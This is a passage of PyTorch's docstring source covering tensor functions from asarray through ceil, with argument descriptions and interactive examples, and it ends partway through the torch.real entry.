Converts :attr:`obj` into a tensor, sharing data and preserving autograd history
if possible.
:attr:`obj` can be one of:
1. a tensor
2. a NumPy array
3. a DLPack capsule
4. a Python object that implements the buffer protocol
5. a Python sequence
For each of the mentioned options, in order, this function will assume :attr:`obj`
is of that type and try, first, sharing memory. Only then, it will make a copy (if
necessary).
The dtype of the result tensor is inferred from the input object, except when
object is (4): an object that implements the buffer protocol (see :func:`torch.frombuffer`).
In that case, the buffer is interpreted as an array of bytes, which are grouped
according to the size of the given :attr:`dtype` or the global default
(see :func:`torch.set_default_tensor_type`) if `None` is given.
For example: NumPy arrays also implement the buffer protocol. However, since NumPy
arrays have higher priority than objects implementing the buffer protocol, this function
will handle them as NumPy arrays. In other words, it will infer its dtype as if using
``torch.from_numpy`` (instead of ``torch.frombuffer``).
.. seealso::
:func:`torch.as_tensor` tries to avoid copies for tensors and NumPy arrays.
:func:`torch.tensor` always copies the data from the input object.
:func:`torch.from_numpy` creates a tensor that shares its memory with a NumPy array.
:func:`torch.frombuffer` creates a tensor that shares its memory with an object
that implements the buffer protocol.
:func:`torch.utils.dlpack.from_dlpack` creates a tensor that shares its memory
with the object represented in the dlpack.
Args:
obj (object): a Python object that satisfies, at least, one of the five options
mentioned above.
Keyword args:
dtype (:class:`torch.dtype`, optional): the desired data type of returned tensor.
Default: if ``None``, it will be inferred from :attr:`obj`.
copy (bool, optional): flags whether the object memory should be copied or not.
If ``None``, then the result tensor shares memory with the Python object
whenever possible. If ``True``, then the object memory is copied. If ``False``,
then the object memory is shared. If the object memory cannot be shared
and this flag is ``False``, then an error is thrown.
device (:class:`torch.device`, optional): the device of the constructed tensor.
If `None`, then the device of :attr:`obj` is used. Else, it either copies
the data, if :attr:`obj` lives in a different device, or it shares the
memory, if :attr:`obj` lives in the same device.
requires_grad (bool, optional): If autograd should record operations on the
returned tensor. However, if this flag is ``False`` and the input object
is a non-leaf :class:`Tensor`, this function will call :func:`torch.Tensor.detach`.
Example::
>>> a = torch.tensor([1, 2, 3])
>>> # Shares memory with tensor 'a'
>>> b = torch.asarray(a)
>>> a.data_ptr() == b.data_ptr()
True
>>> # Forces memory copy
>>> c = torch.asarray(a, copy=True)
>>> a.data_ptr() == c.data_ptr()
False
>>> a = torch.tensor([1, 2, 3], requires_grad=True).float()
>>> b = a + 2
>>> b
tensor([1., 2., 3.], grad_fn=<AddBackward0>)
>>> # Shares memory with tensor 'b', with no grad
>>> c = torch.asarray(b)
>>> c
tensor([1., 2., 3.])
>>> # Shares memory with tensor 'b', retaining autograd history
>>> d = torch.asarray(b, requires_grad=True)
>>> d
tensor([1., 2., 3.], grad_fn=<AddBackward0>)
>>> array = numpy.array([1, 2, 3])
>>> # Shares memory with array 'array'
>>> t1 = torch.asarray(array)
>>> array.__array_interface__['data'][0] == t1.data_ptr()
True
>>> # Copies memory due to dtype mismatch
>>> t2 = torch.asarray(array, dtype=torch.float32)
>>> array.__array_interface__['data'][0] == t1.data_ptr()
False
""")
add_docstr(torch.baddbmm,
r"""
baddbmm(input, batch1, batch2, *, beta=1, alpha=1, out=None) -> Tensor
Performs a batch matrix-matrix product of matrices in :attr:`batch1`
and :attr:`batch2`.
:attr:`input` is added to the final result.
:attr:`batch1` and :attr:`batch2` must be 3-D tensors each containing the same
number of matrices.
If :attr:`batch1` is a :math:`(b \times n \times m)` tensor, :attr:`batch2` is a
:math:`(b \times m \times p)` tensor, then :attr:`input` must be
:ref:`broadcastable <broadcasting-semantics>` with a
:math:`(b \times n \times p)` tensor and :attr:`out` will be a
:math:`(b \times n \times p)` tensor. Both :attr:`alpha` and :attr:`beta` mean the
same as the scaling factors used in :meth:`torch.addbmm`.
.. math::
\text{out}_i = \beta\ \text{input}_i + \alpha\ (\text{batch1}_i \mathbin{@} \text{batch2}_i)
If :attr:`beta` is 0, then :attr:`input` will be ignored, and `nan` and `inf` in
it will not be propagated.
""" + r"""
For inputs of type `FloatTensor` or `DoubleTensor`, arguments :attr:`beta` and
:attr:`alpha` must be real numbers, otherwise they should be integers.
{tf32_note}
Args:
input (Tensor): the tensor to be added
batch1 (Tensor): the first batch of matrices to be multiplied
batch2 (Tensor): the second batch of matrices to be multiplied
Keyword args:
beta (Number, optional): multiplier for :attr:`input` (:math:`\beta`)
alpha (Number, optional): multiplier for :math:`\text{{batch1}} \mathbin{{@}} \text{{batch2}}` (:math:`\alpha`)
{out}
Example::
>>> M = torch.randn(10, 3, 5)
>>> batch1 = torch.randn(10, 3, 4)
>>> batch2 = torch.randn(10, 4, 5)
>>> torch.baddbmm(M, batch1, batch2).size()
torch.Size([10, 3, 5])
""".format(**common_args, **tf32_notes))
add_docstr(torch.bernoulli,
r"""
bernoulli(input, *, generator=None, out=None) -> Tensor
Draws binary random numbers (0 or 1) from a Bernoulli distribution.
The :attr:`input` tensor should be a tensor containing probabilities
to be used for drawing the binary random number.
Hence, all values in :attr:`input` have to be in the range:
:math:`0 \leq \text{input}_i \leq 1`.
The :math:`\text{i}^{th}` element of the output tensor will draw a
value :math:`1` according to the :math:`\text{i}^{th}` probability value given
in :attr:`input`.
.. math::
\text{out}_{i} \sim \mathrm{Bernoulli}(p = \text{input}_{i})
""" + r"""
The returned :attr:`out` tensor only has values 0 or 1 and is of the same
shape as :attr:`input`.
:attr:`out` can have integral ``dtype``, but :attr:`input` must have floating
point ``dtype``.
Args:
input (Tensor): the input tensor of probability values for the Bernoulli distribution
Keyword args:
{generator}
{out}
Example::
>>> a = torch.empty(3, 3).uniform_(0, 1) # generate a uniform random matrix with range [0, 1]
>>> a
tensor([[ 0.1737, 0.0950, 0.3609],
[ 0.7148, 0.0289, 0.2676],
[ 0.9456, 0.8937, 0.7202]])
>>> torch.bernoulli(a)
tensor([[ 1., 0., 0.],
[ 0., 0., 0.],
[ 1., 1., 1.]])
>>> a = torch.ones(3, 3) # probability of drawing "1" is 1
>>> torch.bernoulli(a)
tensor([[ 1., 1., 1.],
[ 1., 1., 1.],
[ 1., 1., 1.]])
>>> a = torch.zeros(3, 3) # probability of drawing "1" is 0
>>> torch.bernoulli(a)
tensor([[ 0., 0., 0.],
[ 0., 0., 0.],
[ 0., 0., 0.]])
""".format(**common_args))
add_docstr(torch.bincount,
r"""
bincount(input, weights=None, minlength=0) -> Tensor
Count the frequency of each value in an array of non-negative ints.
The number of bins (size 1) is one larger than the largest value in
:attr:`input` unless :attr:`input` is empty, in which case the result is a
tensor of size 0. If :attr:`minlength` is specified, the number of bins is at least
:attr:`minlength` and if :attr:`input` is empty, then the result is a tensor of size
:attr:`minlength` filled with zeros. If ``n`` is the value at position ``i``,
``out[n] += weights[i]`` if :attr:`weights` is specified else
``out[n] += 1``.
Note:
{backward_reproducibility_note}
Arguments:
input (Tensor): 1-d int tensor
weights (Tensor): optional, weight for each value in the input tensor.
Should be of same size as input tensor.
minlength (int): optional, minimum number of bins. Should be non-negative.
Returns:
output (Tensor): a tensor of shape ``Size([max(input) + 1])`` if
:attr:`input` is non-empty, else ``Size(0)``
Example::
>>> input = torch.randint(0, 8, (5,), dtype=torch.int64)
>>> weights = torch.linspace(0, 1, steps=5)
>>> input, weights
(tensor([4, 3, 6, 3, 4]),
tensor([ 0.0000, 0.2500, 0.5000, 0.7500, 1.0000])
>>> torch.bincount(input)
tensor([0, 0, 0, 2, 2, 0, 1])
>>> input.bincount(weights)
tensor([0.0000, 0.0000, 0.0000, 1.0000, 1.0000, 0.0000, 0.5000])
""".format(**reproducibility_notes))
add_docstr(torch.bitwise_not,
r"""
bitwise_not(input, *, out=None) -> Tensor
Computes the bitwise NOT of the given input tensor. The input tensor must be of
integral or Boolean types. For bool tensors, it computes the logical NOT.
Args:
{input}
Keyword args:
{out}
Example::
>>> torch.bitwise_not(torch.tensor([-1, -2, 3], dtype=torch.int8))
tensor([ 0, 1, -4], dtype=torch.int8)
""".format(**common_args))
add_docstr(torch.bmm,
r"""
bmm(input, mat2, *, out=None) -> Tensor
Performs a batch matrix-matrix product of matrices stored in :attr:`input`
and :attr:`mat2`.
:attr:`input` and :attr:`mat2` must be 3-D tensors each containing
the same number of matrices.
If :attr:`input` is a :math:`(b \times n \times m)` tensor, :attr:`mat2` is a
:math:`(b \times m \times p)` tensor, :attr:`out` will be a
:math:`(b \times n \times p)` tensor.
.. math::
\text{out}_i = \text{input}_i \mathbin{@} \text{mat2}_i
""" + r"""
{tf32_note}
.. note:: This function does not :ref:`broadcast <broadcasting-semantics>`.
For broadcasting matrix products, see :func:`torch.matmul`.
Args:
input (Tensor): the first batch of matrices to be multiplied
mat2 (Tensor): the second batch of matrices to be multiplied
Keyword Args:
{out}
Example::
>>> input = torch.randn(10, 3, 4)
>>> mat2 = torch.randn(10, 4, 5)
>>> res = torch.bmm(input, mat2)
>>> res.size()
torch.Size([10, 3, 5])
""".format(**common_args, **tf32_notes))
add_docstr(torch.bitwise_and,
r"""
bitwise_and(input, other, *, out=None) -> Tensor
Computes the bitwise AND of :attr:`input` and :attr:`other`. The input tensor must be of
integral or Boolean types. For bool tensors, it computes the logical AND.
Args:
input: the first input tensor
other: the second input tensor
Keyword args:
{out}
Example::
>>> torch.bitwise_and(torch.tensor([-1, -2, 3], dtype=torch.int8), torch.tensor([1, 0, 3], dtype=torch.int8))
tensor([1, 0, 3], dtype=torch.int8)
>>> torch.bitwise_and(torch.tensor([True, True, False]), torch.tensor([False, True, False]))
tensor([ False, True, False])
""".format(**common_args))
add_docstr(torch.bitwise_or,
r"""
bitwise_or(input, other, *, out=None) -> Tensor
Computes the bitwise OR of :attr:`input` and :attr:`other`. The input tensor must be of
integral or Boolean types. For bool tensors, it computes the logical OR.
Args:
input: the first input tensor
other: the second input tensor
Keyword args:
{out}
Example::
>>> torch.bitwise_or(torch.tensor([-1, -2, 3], dtype=torch.int8), torch.tensor([1, 0, 3], dtype=torch.int8))
tensor([-1, -2, 3], dtype=torch.int8)
>>> torch.bitwise_or(torch.tensor([True, True, False]), torch.tensor([False, True, False]))
tensor([ True, True, False])
""".format(**common_args))
add_docstr(torch.bitwise_xor,
r"""
bitwise_xor(input, other, *, out=None) -> Tensor
Computes the bitwise XOR of :attr:`input` and :attr:`other`. The input tensor must be of
integral or Boolean types. For bool tensors, it computes the logical XOR.
Args:
input: the first input tensor
other: the second input tensor
Keyword args:
{out}
Example::
>>> torch.bitwise_xor(torch.tensor([-1, -2, 3], dtype=torch.int8), torch.tensor([1, 0, 3], dtype=torch.int8))
tensor([-2, -2, 0], dtype=torch.int8)
>>> torch.bitwise_xor(torch.tensor([True, True, False]), torch.tensor([False, True, False]))
tensor([ True, False, False])
""".format(**common_args))
add_docstr(torch.bitwise_left_shift,
r"""
bitwise_left_shift(input, other, *, out=None) -> Tensor
Computes the left arithmetic shift of :attr:`input` by :attr:`other` bits.
The result will have the same dtype as :attr:`input`.
The operation applied is:
.. math::
\text{{out}}_i = \text{{input}}_i \times 2 ^ {{\text{{other}}_i}}
Args:
input (Tensor or Scalar): the first input tensor
other (Tensor or Scalar): the second input tensor
Keyword args:
{out}
Example::
>>> torch.bitwise_left_shift(torch.tensor([-1, -2, 3], dtype=torch.int8), torch.tensor([1, 0, 3], dtype=torch.int8))
tensor([-2, -2, 24], dtype=torch.int8)
""".format(**common_args))
add_docstr(torch.bitwise_right_shift,
r"""
bitwise_right_shift(input, other, *, out=None) -> Tensor
Computes the right arithmetic shift of :attr:`input` by :attr:`other` bits.
The result will have the same dtype as :attr:`input`.
The operation applied is:
.. math::
\text{{out}}_i = \text{{input}}_i / 2 ^ {{\text{{other}}_i}}
Args:
input (Tensor or Scalar): the first input tensor
other (Tensor or Scalar): the second input tensor
Keyword args:
{out}
Example::
>>> torch.bitwise_right_shift(torch.tensor([-2, -7, 31], dtype=torch.int8), torch.tensor([1, 0, 3], dtype=torch.int8))
tensor([-1, -7, 3], dtype=torch.int8)
""".format(**common_args))
add_docstr(torch.broadcast_to,
r"""
broadcast_to(input, shape) -> Tensor
Broadcasts :attr:`input` to the shape :attr:`shape`.
Equivalent to calling ``input.expand(shape)``. See :meth:`~Tensor.expand` for details.
Args:
{input}
shape (list, tuple, or :class:`torch.Size`): the new shape.
Example::
>>> x = torch.tensor([1, 2, 3])
>>> torch.broadcast_to(x, (3, 3))
tensor([[1, 2, 3],
[1, 2, 3],
[1, 2, 3]])
""".format(**common_args))
add_docstr(torch.stack,
r"""
stack(tensors, dim=0, *, out=None) -> Tensor
Concatenates a sequence of tensors along a new dimension.
All tensors need to be of the same size.
Arguments:
tensors (sequence of Tensors): sequence of tensors to concatenate
dim (int): dimension to insert. Has to be between 0 and the number
of dimensions of concatenated tensors (inclusive)
Keyword args:
{out}
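The example below is a minimal illustration: two 1-D tensors are stacked along a new leading dimension, and then along ``dim=1``.
Example::
>>> x = torch.tensor([1, 2, 3])
>>> y = torch.tensor([4, 5, 6])
>>> torch.stack((x, y))
tensor([[1, 2, 3],
[4, 5, 6]])
>>> torch.stack((x, y), dim=1)
tensor([[1, 4],
[2, 5],
[3, 6]])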
""".format(**common_args))
add_docstr(torch.hstack,
r"""
hstack(tensors, *, out=None) -> Tensor
Stack tensors in sequence horizontally (column wise).
This is equivalent to concatenation along the first axis for 1-D tensors, and along the second axis for all other tensors.
Args:
tensors (sequence of Tensors): sequence of tensors to concatenate
Keyword args:
{out}
Example::
>>> a = torch.tensor([1, 2, 3])
>>> b = torch.tensor([4, 5, 6])
>>> torch.hstack((a,b))
tensor([1, 2, 3, 4, 5, 6])
>>> a = torch.tensor([[1],[2],[3]])
>>> b = torch.tensor([[4],[5],[6]])
>>> torch.hstack((a,b))
tensor([[1, 4],
[2, 5],
[3, 6]])
""".format(**common_args))
add_docstr(torch.vstack,
r"""
vstack(tensors, *, out=None) -> Tensor
Stack tensors in sequence vertically (row wise).
This is equivalent to concatenation along the first axis after all 1-D tensors have been reshaped by :func:`torch.atleast_2d`.
Args:
tensors (sequence of Tensors): sequence of tensors to concatenate
Keyword args:
{out}
Example::
>>> a = torch.tensor([1, 2, 3])
>>> b = torch.tensor([4, 5, 6])
>>> torch.vstack((a,b))
tensor([[1, 2, 3],
[4, 5, 6]])
>>> a = torch.tensor([[1],[2],[3]])
>>> b = torch.tensor([[4],[5],[6]])
>>> torch.vstack((a,b))
tensor([[1],
[2],
[3],
[4],
[5],
[6]])
""".format(**common_args))
add_docstr(torch.dstack,
r"""
dstack(tensors, *, out=None) -> Tensor
Stack tensors in sequence depthwise (along third axis).
This is equivalent to concatenation along the third axis after 1-D and 2-D tensors have been reshaped by :func:`torch.atleast_3d`.
Args:
tensors (sequence of Tensors): sequence of tensors to concatenate
Keyword args:
{out}
Example::
>>> a = torch.tensor([1, 2, 3])
>>> b = torch.tensor([4, 5, 6])
>>> torch.dstack((a,b))
tensor([[[1, 4],
[2, 5],
[3, 6]]])
>>> a = torch.tensor([[1],[2],[3]])
>>> b = torch.tensor([[4],[5],[6]])
>>> torch.dstack((a,b))
tensor([[[1, 4]],
[[2, 5]],
[[3, 6]]])
""".format(**common_args))
add_docstr(torch.tensor_split,
r"""
tensor_split(input, indices_or_sections, dim=0) -> List of Tensors
Splits a tensor into multiple sub-tensors, all of which are views of :attr:`input`,
along dimension :attr:`dim` according to the indices or number of sections specified
by :attr:`indices_or_sections`. This function is based on NumPy's
:func:`numpy.array_split`.
Args:
input (Tensor): the tensor to split
indices_or_sections (Tensor, int or list or tuple of ints):
If :attr:`indices_or_sections` is an integer ``n`` or a zero dimensional long tensor
with value ``n``, :attr:`input` is split into ``n`` sections along dimension :attr:`dim`.
If :attr:`input` is divisible by ``n`` along dimension :attr:`dim`, each
section will be of equal size, :code:`input.size(dim) / n`. If :attr:`input`
is not divisible by ``n``, the sizes of the first :code:`int(input.size(dim) % n)`
sections will have size :code:`int(input.size(dim) / n) + 1`, and the rest will
have size :code:`int(input.size(dim) / n)`.
If :attr:`indices_or_sections` is a list or tuple of ints, or a one-dimensional long
tensor, then :attr:`input` is split along dimension :attr:`dim` at each of the indices
in the list, tuple or tensor. For instance, :code:`indices_or_sections=[2, 3]` and :code:`dim=0`
would result in the tensors :code:`input[:2]`, :code:`input[2:3]`, and :code:`input[3:]`.
If indices_or_sections is a tensor, it must be a zero-dimensional or one-dimensional
long tensor on the CPU.
dim (int, optional): dimension along which to split the tensor. Default: ``0``
Example::
>>> x = torch.arange(8)
>>> torch.tensor_split(x, 3)
(tensor([0, 1, 2]), tensor([3, 4, 5]), tensor([6, 7]))
>>> x = torch.arange(7)
>>> torch.tensor_split(x, 3)
(tensor([0, 1, 2]), tensor([3, 4]), tensor([5, 6]))
>>> torch.tensor_split(x, (1, 6))
(tensor([0]), tensor([1, 2, 3, 4, 5]), tensor([6]))
>>> x = torch.arange(14).reshape(2, 7)
>>> x
tensor([[ 0, 1, 2, 3, 4, 5, 6],
[ 7, 8, 9, 10, 11, 12, 13]])
>>> torch.tensor_split(x, 3, dim=1)
(tensor([[0, 1, 2],
[7, 8, 9]]),
tensor([[ 3, 4],
[10, 11]]),
tensor([[ 5, 6],
[12, 13]]))
>>> torch.tensor_split(x, (1, 6), dim=1)
(tensor([[0],
[7]]),
tensor([[ 1, 2, 3, 4, 5],
[ 8, 9, 10, 11, 12]]),
tensor([[ 6],
[13]]))
""")
add_docstr(torch.chunk,
r"""
chunk(input, chunks, dim=0) -> List of Tensors
Attempts to split a tensor into the specified number of chunks. Each chunk is a view of
the input tensor.
.. note::
This function may return fewer than the specified number of chunks!
.. seealso::
:func:`torch.tensor_split`, a function that always returns exactly the specified number of chunks
If the tensor size along the given dimension :attr:`dim` is divisible by :attr:`chunks`,
all returned chunks will be the same size.
If the tensor size along the given dimension :attr:`dim` is not divisible by :attr:`chunks`,
all returned chunks will be the same size, except the last one.
If such division is not possible, this function may return fewer
than the specified number of chunks.
Arguments:
input (Tensor): the tensor to split
chunks (int): number of chunks to return
dim (int): dimension along which to split the tensor
Example::
>>> torch.arange(11).chunk(6)
(tensor([0, 1]),
tensor([2, 3]),
tensor([4, 5]),
tensor([6, 7]),
tensor([8, 9]),
tensor([10]))
>>> torch.arange(12).chunk(6)
(tensor([0, 1]),
tensor([2, 3]),
tensor([4, 5]),
tensor([6, 7]),
tensor([8, 9]),
tensor([10, 11]))
>>> torch.arange(13).chunk(6)
(tensor([0, 1, 2]),
tensor([3, 4, 5]),
tensor([6, 7, 8]),
tensor([ 9, 10, 11]),
tensor([12]))
""")
add_docstr(torch.unsafe_chunk,
r"""
unsafe_chunk(input, chunks, dim=0) -> List of Tensors
Works like :func:`torch.chunk` but without enforcing the autograd restrictions
on inplace modification of the outputs.
.. warning::
This function is safe to use as long as only the input, or only the outputs
are modified inplace after calling this function. It is the user's
responsibility to ensure that is the case. If both the input and one or more
of the outputs are modified inplace, gradients computed by autograd will be
silently incorrect.
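The splitting behavior itself matches :func:`torch.chunk`; the example below is a minimal illustration of the chunks produced and does not involve autograd.
Example::
>>> x = torch.arange(6.)
>>> parts = torch.unsafe_chunk(x, 3)
>>> [p.tolist() for p in parts]
[[0.0, 1.0], [2.0, 3.0], [4.0, 5.0]]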
""")
add_docstr(torch.unsafe_split,
r"""
unsafe_split(tensor, split_size_or_sections, dim=0) -> List of Tensors
Works like :func:`torch.split` but without enforcing the autograd restrictions
on inplace modification of the outputs.
.. warning::
This function is safe to use as long as only the input, or only the outputs
are modified inplace after calling this function. It is the user's
responsibility to ensure that is the case. If both the input and one or more
of the outputs are modified inplace, gradients computed by autograd will be
silently incorrect.
""")
add_docstr(torch.hsplit,
r"""
hsplit(input, indices_or_sections) -> List of Tensors
Splits :attr:`input`, a tensor with one or more dimensions, into multiple tensors
horizontally according to :attr:`indices_or_sections`. Each split is a view of
:attr:`input`.
If :attr:`input` is one dimensional this is equivalent to calling
torch.tensor_split(input, indices_or_sections, dim=0) (the split dimension is
zero), and if :attr:`input` has two or more dimensions it's equivalent to calling
torch.tensor_split(input, indices_or_sections, dim=1) (the split dimension is 1),
except that if :attr:`indices_or_sections` is an integer it must evenly divide
the split dimension or a runtime error will be thrown.
This function is based on NumPy's :func:`numpy.hsplit`.
Args:
input (Tensor): tensor to split.
indices_or_sections (Tensor, int or list or tuple of ints): See argument in :func:`torch.tensor_split`.
Example::
>>> t = torch.arange(16.0).reshape(4,4)
>>> t
tensor([[ 0., 1., 2., 3.],
[ 4., 5., 6., 7.],
[ 8., 9., 10., 11.],
[12., 13., 14., 15.]])
>>> torch.hsplit(t, 2)
(tensor([[ 0., 1.],
[ 4., 5.],
[ 8., 9.],
[12., 13.]]),
tensor([[ 2., 3.],
[ 6., 7.],
[10., 11.],
[14., 15.]]))
>>> torch.hsplit(t, [3, 6])
(tensor([[ 0., 1., 2.],
[ 4., 5., 6.],
[ 8., 9., 10.],
[12., 13., 14.]]),
tensor([[ 3.],
[ 7.],
[11.],
[15.]]),
tensor([], size=(4, 0)))
""")
add_docstr(torch.vsplit,
r"""
vsplit(input, indices_or_sections) -> List of Tensors
Splits :attr:`input`, a tensor with two or more dimensions, into multiple tensors
vertically according to :attr:`indices_or_sections`. Each split is a view of
:attr:`input`.
This is equivalent to calling torch.tensor_split(input, indices_or_sections, dim=0)
(the split dimension is 0), except that if :attr:`indices_or_sections` is an integer
it must evenly divide the split dimension or a runtime error will be thrown.
This function is based on NumPy's :func:`numpy.vsplit`.
Args:
input (Tensor): tensor to split.
indices_or_sections (Tensor, int or list or tuple of ints): See argument in :func:`torch.tensor_split`.
Example::
>>> t = torch.arange(16.0).reshape(4,4)
>>> t
tensor([[ 0., 1., 2., 3.],
[ 4., 5., 6., 7.],
[ 8., 9., 10., 11.],
[12., 13., 14., 15.]])
>>> torch.vsplit(t, 2)
(tensor([[0., 1., 2., 3.],
[4., 5., 6., 7.]]),
tensor([[ 8., 9., 10., 11.],
[12., 13., 14., 15.]]))
>>> torch.vsplit(t, [3, 6])
(tensor([[ 0., 1., 2., 3.],
[ 4., 5., 6., 7.],
[ 8., 9., 10., 11.]]),
tensor([[12., 13., 14., 15.]]),
tensor([], size=(0, 4)))
""")
add_docstr(torch.dsplit,
r"""
dsplit(input, indices_or_sections) -> List of Tensors
Splits :attr:`input`, a tensor with three or more dimensions, into multiple tensors
depthwise according to :attr:`indices_or_sections`. Each split is a view of
:attr:`input`.
This is equivalent to calling torch.tensor_split(input, indices_or_sections, dim=2)
(the split dimension is 2), except that if :attr:`indices_or_sections` is an integer
it must evenly divide the split dimension or a runtime error will be thrown.
This function is based on NumPy's :func:`numpy.dsplit`.
Args:
input (Tensor): tensor to split.
indices_or_sections (Tensor, int or list or tuple of ints): See argument in :func:`torch.tensor_split`.
Example::
>>> t = torch.arange(16.0).reshape(2, 2, 4)
>>> t
tensor([[[ 0., 1., 2., 3.],
[ 4., 5., 6., 7.]],
[[ 8., 9., 10., 11.],
[12., 13., 14., 15.]]])
>>> torch.dsplit(t, 2)
(tensor([[[ 0., 1.],
[ 4., 5.]],
[[ 8., 9.],
[12., 13.]]]),
tensor([[[ 2., 3.],
[ 6., 7.]],
[[10., 11.],
[14., 15.]]]))
>>> torch.dsplit(t, [3, 6])
(tensor([[[ 0., 1., 2.],
[ 4., 5., 6.]],
[[ 8., 9., 10.],
[12., 13., 14.]]]),
tensor([[[ 3.],
[ 7.]],
[[11.],
[15.]]]),
tensor([], size=(2, 2, 0)))
""")
add_docstr(torch.can_cast,
r"""
can_cast(from, to) -> bool
Determines if a type conversion is allowed under PyTorch casting rules
described in the type promotion :ref:`documentation <type-promotion-doc>`.
Args:
from (dtype): The original :class:`torch.dtype`.
to (dtype): The target :class:`torch.dtype`.
Example::
>>> torch.can_cast(torch.double, torch.float)
True
>>> torch.can_cast(torch.float, torch.int)
False
""")
add_docstr(torch.corrcoef, r"""
corrcoef(input) -> Tensor
Estimates the Pearson product-moment correlation coefficient matrix of the variables given by the :attr:`input` matrix,
where rows are the variables and columns are the observations.
.. note::
The correlation coefficient matrix R is computed using the covariance matrix C as given by
:math:`R_{ij} = \frac{ C_{ij} } { \sqrt{ C_{ii} * C_{jj} } }`
.. note::
Due to floating point rounding, the resulting array may not be Hermitian and its diagonal elements may not be 1.
The real and imaginary values are clipped to the interval [-1, 1] in an attempt to improve this situation.
Args:
input (Tensor): A 2D matrix containing multiple variables and observations, or a
Scalar or 1D vector representing a single variable.
Returns:
(Tensor) The correlation coefficient matrix of the variables.
.. seealso::
:func:`torch.cov` covariance matrix.
Example::
>>> x = torch.tensor([[0, 1, 2], [2, 1, 0]])
>>> torch.corrcoef(x)
tensor([[ 1., -1.],
[-1., 1.]])
>>> x = torch.randn(2, 4)
>>> x
tensor([[-0.2678, -0.0908, -0.3766, 0.2780],
[-0.5812, 0.1535, 0.2387, 0.2350]])
>>> torch.corrcoef(x)
tensor([[1.0000, 0.3582],
[0.3582, 1.0000]])
>>> torch.corrcoef(x[0])
tensor(1.)
""")
add_docstr(torch.cov, r"""
cov(input, *, correction=1, fweights=None, aweights=None) -> Tensor
Estimates the covariance matrix of the variables given by the :attr:`input` matrix, where rows are
the variables and columns are the observations.
A covariance matrix is a square matrix giving the covariance of each pair of variables. The diagonal contains
the variance of each variable (covariance of a variable with itself). By definition, if :attr:`input` represents
a single variable (Scalar or 1D) then its variance is returned.
The unbiased sample covariance of the variables :math:`x` and :math:`y` is given by:
.. math::
\text{cov}_w(x,y) = \frac{\sum^{N}_{i = 1}(x_{i} - \bar{x})(y_{i} - \bar{y})}{N~-~1}
where :math:`\bar{x}` and :math:`\bar{y}` are the simple means of :math:`x` and :math:`y`, respectively.
If :attr:`fweights` and/or :attr:`aweights` are provided, the unbiased weighted covariance
is calculated, which is given by:
.. math::
\text{cov}_w(x,y) = \frac{\sum^{N}_{i = 1}w_i(x_{i} - \mu_x^*)(y_{i} - \mu_y^*)}{\sum^{N}_{i = 1}w_i~-~1}
where :math:`w` denotes :attr:`fweights` or :attr:`aweights` based on whichever is provided, or
:math:`w = fweights \times aweights` if both are provided, and
:math:`\mu_x^* = \frac{\sum^{N}_{i = 1}w_ix_{i} }{\sum^{N}_{i = 1}w_i}` is the weighted mean of the variable.
Args:
input (Tensor): A 2D matrix containing multiple variables and observations, or a
Scalar or 1D vector representing a single variable.
Keyword Args:
correction (int, optional): difference between the sample size and sample degrees of freedom.
Defaults to Bessel's correction, ``correction = 1``, which returns the unbiased estimate
even if both :attr:`fweights` and :attr:`aweights` are specified. ``correction = 0``
returns the simple average.
fweights (tensor, optional): A Scalar or 1D tensor of observation vector frequencies representing the number of
times each observation should be repeated. Its numel must equal the number of columns of :attr:`input`.
Must have integral dtype. Ignored if ``None``. Defaults to ``None``.
aweights (tensor, optional): A Scalar or 1D array of observation vector weights.
These relative weights are typically large for observations considered “important” and smaller for
observations considered less “important”. Its numel must equal the number of columns of :attr:`input`.
Must have floating point dtype. Ignored if ``None``. Defaults to ``None``.
Returns:
(Tensor) The covariance matrix of the variables.
.. seealso::
:func:`torch.corrcoef` normalized covariance matrix.
Example::
>>> x = torch.tensor([[0, 2], [1, 1], [2, 0]]).T
>>> x
tensor([[0, 1, 2],
[2, 1, 0]])
>>> torch.cov(x)
tensor([[ 1., -1.],
[-1., 1.]])
>>> torch.cov(x, correction=0)
tensor([[ 0.6667, -0.6667],
[-0.6667, 0.6667]])
>>> fw = torch.randint(1, 10, (3,))
>>> fw
tensor([1, 6, 9])
>>> aw = torch.rand(3)
>>> aw
tensor([0.4282, 0.0255, 0.4144])
>>> torch.cov(x, fweights=fw, aweights=aw)
tensor([[ 0.4169, -0.4169],
[-0.4169, 0.4169]])
""")
add_docstr(torch.cat,
r"""
cat(tensors, dim=0, *, out=None) -> Tensor
Concatenates the given sequence of tensors in :attr:`tensors` along the given dimension.
All tensors must either have the same shape (except in the concatenating
dimension) or be empty.
:func:`torch.cat` can be seen as an inverse operation for :func:`torch.split`
and :func:`torch.chunk`.
:func:`torch.cat` can be best understood via examples.
Args:
tensors (sequence of Tensors): any python sequence of tensors of the same type.
Non-empty tensors provided must have the same shape, except in the
cat dimension.
dim (int, optional): the dimension over which the tensors are concatenated
Keyword args:
{out}
Example::
>>> x = torch.randn(2, 3)
>>> x
tensor([[ 0.6580, -1.0969, -0.4614],
[-0.1034, -0.5790, 0.1497]])
>>> torch.cat((x, x, x), 0)
tensor([[ 0.6580, -1.0969, -0.4614],
[-0.1034, -0.5790, 0.1497],
[ 0.6580, -1.0969, -0.4614],
[-0.1034, -0.5790, 0.1497],
[ 0.6580, -1.0969, -0.4614],
[-0.1034, -0.5790, 0.1497]])
>>> torch.cat((x, x, x), 1)
tensor([[ 0.6580, -1.0969, -0.4614, 0.6580, -1.0969, -0.4614, 0.6580,
-1.0969, -0.4614],
[-0.1034, -0.5790, 0.1497, -0.1034, -0.5790, 0.1497, -0.1034,
-0.5790, 0.1497]])
""".format(**common_args))
add_docstr(torch.concat,
r"""
concat(tensors, dim=0, *, out=None) -> Tensor
Alias of :func:`torch.cat`.
""")
add_docstr(torch.ceil,
r"""
ceil(input, *, out=None) -> Tensor
Returns a new tensor with the ceil of the elements of :attr:`input`,
the smallest integer greater than or equal to each element.
.. math::
\text{out}_{i} = \left\lceil \text{input}_{i} \right\rceil
""" + r"""
Args:
{input}
Keyword args:
{out}
Example::
>>> a = torch.randn(4)
>>> a
tensor([-0.6341, -1.4208, -1.0900, 0.5826])
>>> torch.ceil(a)
tensor([-0., -1., -1., 1.])
""".format(**common_args))
add_docstr(torch.real,
r"""
real(input) -> Tensor
Returns a new tensor containing real values of the :attr:`self` tensor.
The returned tensor and :attr:`self` share the same underlying storage.
.. warning::
:func:`real` is only supported for tensors with complex dtypes.
Args:
{input}
Example::
>>> x=torch.randn(4, dtype=torch.cfloat)
>>> x
tensor([(0.3100+0.3553j), (-0.5445-0.7896j), (-1.6492-0.0633j), (-0.0638-0.8119j)])
>>> x.real
